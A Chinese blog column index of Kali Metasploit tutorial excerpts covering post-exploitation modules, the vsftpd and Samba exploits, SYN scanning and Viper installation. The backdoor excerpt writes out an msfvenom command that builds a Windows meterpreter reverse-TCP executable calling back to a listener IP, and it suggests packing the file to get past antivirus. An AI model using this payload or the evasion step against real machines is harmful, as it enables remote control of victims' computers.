Metasploit内网
文章平均质量分 73
Metasploit内网
兰公子&
已识乾坤大,犹怜草木青
展开
-
kali metasploit 后渗透Post模块
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。原创 2022-10-28 19:08:55 · 407 阅读 · 0 评论 -
kali metasploit 漏洞利用
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。传递通过 MS-RPC 提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在 smb.conf 中,导致允许远程命令执行。在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名。原创 2022-10-28 19:08:09 · 658 阅读 · 0 评论 -
kali metasploit 信息收集
SYN扫描也称半开放扫描。在SYN扫描中,恶意客户企图跟服务器在每个可能的端口建立TCP/IP连接。这通过向服务器每个端口发送一个SYN数据包,装作发起一个三方握手来实现。SYN扫描是恶意黑客不建立完全连接,用来判断通信端口状态的一种手段。这种方法是最老的一种攻击手段,有时用来进行拒绝服务攻击。use auxiliary/scanner/portscan/syn 使用模块。search portscan 搜索portscan模块。show options 查看帮助。1.msf nmao扫描。原创 2022-10-23 19:47:05 · 1238 阅读 · 0 评论 -
kali metasploit 图形化Viper
11.sed -i “s/VIPER_PASSWORD/$VIPER_PASSWORD/g” docker-compose.yml 把密码写入文件。6.chmod +x /usr/local/bin/docker-compose 赋执行权限。8.mkdir -p $VIPER_DIR && cd $VIPER_DIR 创建文件夹并打开。-o /usr/local/bin/docker-compose 拉取脚本。7.export VIPER_DIR=/root/VIPER 设置目录。原创 2022-10-23 18:33:05 · 1144 阅读 · 2 评论 -
kali metasploit 制作后门程序远程操控基本使用方法
kali metasploit制作后门程序远程操控基本使用方法1.后门程序的制作与加密后门的实质就是木马msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exelhost后面加的是本机ip,lport后面加的是想要打开的端口号执行后会在本地生成一个biyu.exe的文件如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。下原创 2021-12-03 10:22:29 · 4041 阅读 · 0 评论